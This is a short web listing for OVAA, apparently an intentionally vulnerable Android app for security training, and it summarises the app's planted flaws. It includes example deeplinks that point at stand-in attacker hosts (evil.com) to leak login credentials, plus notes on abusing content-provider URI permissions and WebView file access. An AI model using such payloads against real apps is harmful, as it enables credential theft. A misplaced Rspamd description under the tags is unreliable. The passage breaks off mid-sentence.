Logo
OVAA (Oversecured Vulnerable Android App)

OVAA (Oversecured Vulnerable Android App)

#Access Control#Specialized Security

Rspamd is an advanced spam filtering system and email processing framework with comprehensive features like Lua API and asynchronous network API.

Visit Website

OVAA (Oversecured Vulnerable Android App) - A Comprehensive Overview of Security Vulnerabilities

OVAA (Oversecured Vulnerable Android App) is an Android application that compiles a list of known and prevalent security vulnerabilities on the platform. Below is a list of identified vulnerabilities: - The installation of an arbitrary login_url via the deeplink oversecured://ovaa/login?url=http://evil.com/ can result in the leakage of the user's username and password during the login process. - Accessing arbitrary content providers (which are not exported but have the attribute android:grantUriPermissions="true") is possible through the deeplink oversecured://ovaa/grant_uri_permissions.

The Attacker's App Needs to Process Oversecured

The app must invoke ovaa.action.GRANT_PERMISSIONS and pass the intent to setResult(code, intent) with flags like Intent.FLAG_GRANT_READ_URI_PERMISSION along with the URI of the content provider. - There is a risk of vulnerable host validation when processing the deeplink oversecured://ovaa/webview?url=.... - The app can open arbitrary URLs through the deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker may exploit this by using the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(